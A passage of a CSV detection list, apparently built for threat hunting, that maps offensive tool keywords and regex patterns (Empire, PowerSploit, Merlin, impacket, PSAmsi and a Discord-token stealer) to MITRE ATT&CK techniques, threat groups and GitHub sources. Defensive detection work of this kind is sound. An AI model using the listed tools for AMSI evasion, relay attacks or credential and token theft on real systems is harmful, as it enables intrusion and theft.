AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","45019"
"*Find-4624Logons*",".{0,1000}Find\-4624Logons.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-ComputerDetails.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45020"
"*Find-4648Logons*",".{0,1000}Find\-4648Logons.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-ComputerDetails.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45021"
"*Find-ADInterestingACL *",".{0,1000}Find\-ADInterestingACL\s.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","45022"
"*Find-ADInterestingACL.ps1*",".{0,1000}Find\-ADInterestingACL\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","45023"
"*FindAdminAccessComputers*",".{0,1000}FindAdminAccessComputers.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","45024"
"*Find-AdminLogonScripts.ps1*",".{0,1000}Find\-AdminLogonScripts\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","45025"
"*findall(r""dQw4w9WgXcQ*",".{0,1000}findall\(r\""dQw4w9WgXcQ.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","45026"
"*find-allvulns*",".{0,1000}find\-allvulns.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45027"
"*Find-AmsiAstSignatures *",".{0,1000}Find\-AmsiAstSignatures\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","45028"
"*Find-AmsiPSTokenSignatures *",".{0,1000}Find\-AmsiPSTokenSignatures\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","45029"
"*Find-AmsiSignatures.ps1*",".{0,1000}Find\-AmsiSignatures\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","45030"
"*Find-AppLockerLogs*",".{0,1000}Find\-AppLockerLogs.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-ComputerDetails.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45031"
"*FindAvailablePort.exe*",".{0,1000}FindAvailablePort\.exe.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","1","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","45032"
"*Find-AVSignature*",".{0,1000}Find\-AVSignature.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45033"
"*Find-BadPrivilege.json*",".{0,1000}Find\-BadPrivilege\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","45034"
"*Find-BadPrivileges-DomainComputers.ps1*",".{0,1000}Find\-BadPrivileges\-DomainComputers\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","45035"
"*Find-ComputersWithRemoteAccessPolicies.json*",".{0,1000}Find\-ComputersWithRemoteAccessPolicies\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","45036"
"*Find-ComputersWithRemoteAccessPolicies.ps1*",".{0,1000}Find\-ComputersWithRemoteAccessPolicies\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","45037"
"*Find-DangerousACLPermissions*",".{0,1000}Find\-DangerousACLPermissions.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","45038"
"*findDelegation.py -dc-ip *",".{0,1000}findDelegation\.py\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","45040"
"*findDelegation.py*",".{0,1000}findDelegation\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45041"
"*Find-DLLHijack*",".{0,1000}Find\-DLLHijack.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45042"
"*Find-DomainShare -*",".{0,1000}Find\-DomainShare\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45043"
"*Find-DomainShare -CheckShareAccess*",".{0,1000}Find\-DomainShare\s\-CheckShareAccess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45044"
"*Find-FileWMImplant*",".{0,1000}Find\-FileWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","45045"
"*Find-Fruit.*",".{0,1000}Find\-Fruit\..{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Find-Fruit.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45046"
"*Find-Fruit.ps1*",".{0,1000}Find\-Fruit\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1108","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45047"
"*findgpocomputeradmin*",".{0,1000}findgpocomputeradmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","45048"
"*Find-GPOComputerAdmin*",".{0,1000}Find\-GPOComputerAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - 